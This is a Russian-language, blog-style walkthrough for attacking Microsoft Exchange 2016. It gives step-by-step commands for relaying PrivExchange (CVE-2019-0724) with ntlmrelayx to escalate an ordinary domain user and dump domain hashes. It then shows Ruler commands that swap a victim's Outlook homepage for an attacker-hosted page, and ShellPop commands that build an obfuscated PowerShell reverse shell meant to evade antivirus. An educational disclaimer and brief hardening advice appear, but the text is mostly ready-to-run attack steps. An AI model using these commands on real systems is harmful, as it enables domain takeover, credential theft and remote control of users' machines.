Атакуем Microsoft Exchange 2016

Привет, дорогой читатель

За текущий год на почтовый сервер от Microsoft вышло приличное количество уязвимостей, в том числе кричитеские получившие максимальный бал 10 за серьезность уязвимости. Весь список посмотреть можно по этой ссылке.

Прошло уже достаточно времени с тех пор, как вышла уязвимость на Microsoft Exchange CVE-2019-0724 с уровнем критичности 9/10

Сегодня мы поведаем Вам, что представляет из себя данная уязвимость и какие могут быть последствия.

ДисклеймерДанная статья написана только в образовательных целях и автор не несёт ответственности за ваши действия. Ни в коем случае не призываем читателей на совершение противозаконных действий. Материал размещен только с целью ознакомления и принятию мер по обеспечению безопасности. Использование материалов в противоправных и противозаконных запрещено законом РК.

Итак, все атаки начинаются с развердки, и воспользуемся нашим любимым средством netdiscover -r и затем nmap:

nmap -sC -sV 10.168.0.150

На всех Exchange серверах с коробки, по умолчанию открыто достаточно много портов:

namp ports

!*-Необходимо осторожно подходить к доступности открытых портов, в случае отсутствия необходимости закрывать порты или обеспечивать недоступность портов для всех сотрудников, оставив только самые необходимые.

Наша цель — Открытая уязвимость CVE-2019-0724 | Microsoft Exchange Server Elevation of Privilege Vulnerability

Security Updates
To determine the support life cycle for your software version or edition, see the Microsoft Support Lifecycle.
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 26 4487052 Security Update Elevation of Privilege Important
4468742
Microsoft Exchange Server 2013 Cumulative Update 22 4345836 Security Update Elevation of Privilege Important
Microsoft Exchange Server 2016 Cumulative Update 12 4471392 Security Update Elevation of Privilege Important
Microsoft Exchange Server 2019 Cumulative Update 1 4471391 Security Update Elevation of Privilege Important

Уязвимость настолько серьезная, что каждый пользователь сети может стать админом домена.
POC: https://github.com/dirkjanm/privexchange/

Exchange privilege escalation attack

Вся эксплуатация будет происходить под обычным доменным пользователем

192.168.1.42 — это наш атакующий хост

Для эксплуатации уязвимости мы быдем использовать ntlmrelayx входящий в состав мощного инструментария Impacket  который уже включен в состав Kali Linux, а так же саму уязвимость PrivExchange

Нам необходимо сгенерировать «ссылку» под имеющимся у нас пользователем

python privexchange.py -ah 192.168.1.42 exchangemail.company.kz -d company.kz -u ivanov_s -p 123456!

Затем запустить «слушатель»

ntlmrelayx.py -t ldap://exchangemail.company.kz --escalate-user ntu

или

impacket-ntlmrelayx -t ldap://exchangemail.company.kz --escalate-user ntu

Далее под текущим пользователем нам необходимо веб-браузером перейти по ссылке http://Atacker/privexchange/

Покажу Вам результат на не пропатченных системах (IP-адреса и линки могут не совпадать со статьей и указаны для примера):

ntlmrelay-exchange

Мы плучаем привелигированного пользователя под которым можно делать все!

secretsdump-hashes

Результат на полностью пропатченных системах:

PrivExchange_Impacket

Дамп домена сделан. На пропатченных системах атака данной уязвимостью заканчивается получением формалозиванных отчетов о составе контроллера домена (пользователи, группы, политики, компьютеры).  Далее мы можем развивать атаку любыми извесными Вам способами использовав полученные данные домена.

Domain_Dump

Системная информация эксплуатируеммого почтового сервера, который был атакован

systeminfo

Необходимо помимо установки обновлений закрывающих уязвимости в данном конкретном случае провести работы по урезанию прав доступа почтового сервера к контроллеру домена. К сожалению даже с патчами вытаскивать все учетки он будет, exchange будет висеть в правах на чтение личной информации на всех учетках, что наследуют от корня права и группы, необходимо урезать права до минимума, оставить права на редактирование созданных атрибутов и чтение личной информации. Но делать это нужно с предельной осторожностью.

Идейный вдохновитель и первоисточник Dirk-jan Mollema

Дальше мы можем использовать еще одну не менее серьезную уязвимость под названием Roler

При эксплуатации данной уязвимости, была обнаружена возможность осуществлять различные атаки на конечных пользователей через MS Outlook как проводник между почтовым сервером Exchange и Атакующим.
Цель атаки заключается в уязвимости почтового сервера Echange выполнять удаленные процедуры имея авторизационные данные пользователя, атака называется Ruler и имеет классификацию CVE-2017-11774 (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774).
Microsoft CVE-2017-11774: Microsoft Outlook Security Feature Bypass Vulnerability
Severity 7 (https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-11774)
CVSS (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Published 10/10/2017 Created 07/25/2018 Added 10/10/2017 Modified 05/16/2018
Данную уязвимость активно использует группировка APT33 group (она же Elfin) с января 2017 года.
Ruler обладает огромным количеством функций, которые уже были реализованы, и множеством функций, которые еще находятся в разработке.

С его помощью можно:

  • Получить список пользователей
  • Посмотреть текущие настройки правил почты
  • Создать новые вредоносные почтовые правила
  • Удаление почтовые правила
  • Сбросить Глобальный список адресов (Global Address List (GAL))
  • Выполнение VBScript через формы

Для более еффективного взаимодействия с Exchange — ruler использует службу Autodiscover (так же, как и ваш Outlook клиент), чтобы обнаружить соответствующую информацию и оставаться в тени для средств предотвращения вторжений.
В данном случае продемонстрирую, как можно имея пару логина и пароля можно подменить удаленно главную страницу Outlook.

wget https://github.com/sensepost/ruler/releases/download/2.2.0/ruler-linux64
./ruler-linux64 --username "ivanov_s" --password "123456!" --email "[email protected]" check --url https://exchangemail.company.kz/autodiscover/autodiscover.xml

Если нужен вывод и обход сертификата — используйте —verbose —insecure —debug check

Ruler

Получив удачный ответ от сервера, можем подменять главную страницу к примеру на реверс шелл

./ruler-linux64 --username "ivanov_s" --email "[email protected]" --url https://exchangemail.bank.kz/Autodiscover/Autodiscover.xml --verbose --insecure homepage add --url "http://10.1.42.49:80/EXCH.html"

Заходим в оутлук и удивляемся

Outlook_Reverse

Наша главная страница заменена. На скриншоте я специально совершил опечатку в инъекции для того, чтобы наглядно было видно что инъекция прошла.

Сам реверс можно использовать ShellPOP с обходом AV систем

cd /opt && git clone https://github.com/0x00-0x00/ShellPop.git
cd ShellPop && chmod +x setup.py && python setup.py install && pip install -r requirements.txt && shellpop -list
shellpop --host eth0 -P 1234 --payload windows/reverse/tcp/powershell --xor

Как видите атаки на почтовый сервер Exchange разнообразны и могут нести за собой серьезные последствия от повышения привелегий до уровня «Бога Домена» или атак на пользователей.

!Не используйте данную информацию во вред, только для улучшения собственной безопасности.

Tagged with: